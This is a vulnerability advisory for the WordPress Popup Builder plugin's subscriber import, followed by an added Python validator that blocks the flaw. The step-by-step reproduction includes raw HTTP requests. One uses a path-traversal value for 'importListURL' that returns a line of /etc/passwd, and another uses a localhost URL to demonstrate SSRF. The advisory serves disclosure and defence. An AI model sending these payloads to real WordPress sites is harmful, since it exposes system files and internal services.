Description
The plugin does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attacks in Multisite WordPress configurations.
1. Create a multisite WordPress setup, e.g. using Docker containers, and set up a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the popup-builder plugin and activate it for the network.
3. Login as said new administrator to the separate site (here: "site2" at "/site2/").
4. In the admin dashboard, navigate to Popup Builder -> Add New and add a new dummy subscription.
5. Navigate to All Subscribers -> Import. Choose the dummy subscription and enter any text in the file field.
6. Intercept the HTTP request issued by submitting the import form, which will include a valid nonce.
7. Change the parameter "importListURL" to "../../../../../../../../../../../../../../../../etc/passwd":
POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 156
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close
action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=../../../../../../../../../../../../../../../../etc/passwd&beforeSend=
This will output the first line of /etc/passwd in the response:
<div class="subFormItem__title">
root:x:0:0:root:/root:/bin/bash
</div>
8. Alternatively, "importListURL" can be set to any URL, allowing for SSRF, e.g. "importListURL=http://localhost:1337" with a "python -m http.server 1337" serving a "hacked.txt":
POST /site2/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 130
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [Cookies]
Connection: close
action=sgpb_import_subscribers&nonce=7ab37e2ddd&popupSubscriptionList=8&importListURL=http://localhost:1337/hacked.txt&beforeSend=
Response:
<div class="subFormItem__title">
Hacked
</div>
Output from the Python HTTP server:
root@6bd896f15815:/var/www/html# python3 -m http.server --directory /tmp 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
127.0.0.1 - - [21/Nov/2023 15:05:01] "GET /hacked.txt HTTP/1.1" 200 -
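The check the plugin is missing, as an added example (not code from this report or from the plugin): a validator for the importListURL value that only accepts absolute http(s) URLs whose host resolves to a public address, so both values used above (the relative path and the loopback URL) are rejected before any request is made. The sample values and the hypothetical "lists.example.com" host are constructed; the resolver is injectable so the behaviour can be checked offline.

```python
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit

# Constructed samples: the two importListURL values from the report plus a benign one.
SAMPLE_VALUES = {
    "traversal": "../../../../../../../../../../../../../../../../etc/passwd",
    "loopback": "http://localhost:1337/hacked.txt",
    "benign": "https://lists.example.com/subscribers.csv",  # hypothetical remote CSV
}
Resolver = Callable[[str], Iterable[str]]

def dns_resolve(host: str) -> list[str]:
    # Real DNS lookup; every A/AAAA record must pass the check, not just the first one.
    return [info[4][0] for info in socket.getaddrinfo(host, None)]

def is_public_address(ip: str) -> bool:
    """Reject loopback, RFC 1918, link-local, reserved and unspecified addresses."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def validate_import_url(value: str, resolve: Resolver = dns_resolve) -> tuple[bool, str]:
    """Return (allowed, reason): only absolute http(s) URLs to public hosts pass."""
    parts = urlsplit(value.strip())
    if parts.scheme not in ("http", "https"):
        return False, "scheme must be http or https (relative paths and file: are rejected)"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if parts.username or parts.password:
        return False, "credentials in the URL are not allowed"
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP, no lookup needed
    except ValueError:
        try:
            addresses = list(resolve(host))
        except OSError:
            addresses = []
    if not addresses:
        return False, "host does not resolve"
    for ip in addresses:
        if not is_public_address(ip):
            return False, f"host resolves to non-public address {ip}"
    return True, "ok"

def check_samples(resolve: Resolver = dns_resolve) -> dict[str, bool]:
    """True means the import would be allowed to proceed for that sample."""
    return {name: validate_import_url(v, resolve)[0] for name, v in SAMPLE_VALUES.items()}
```

The validated address should also be the one the fetch actually connects to, and redirects from the fetched URL need the same check, otherwise a re-resolving host or a redirect can still land on an internal service.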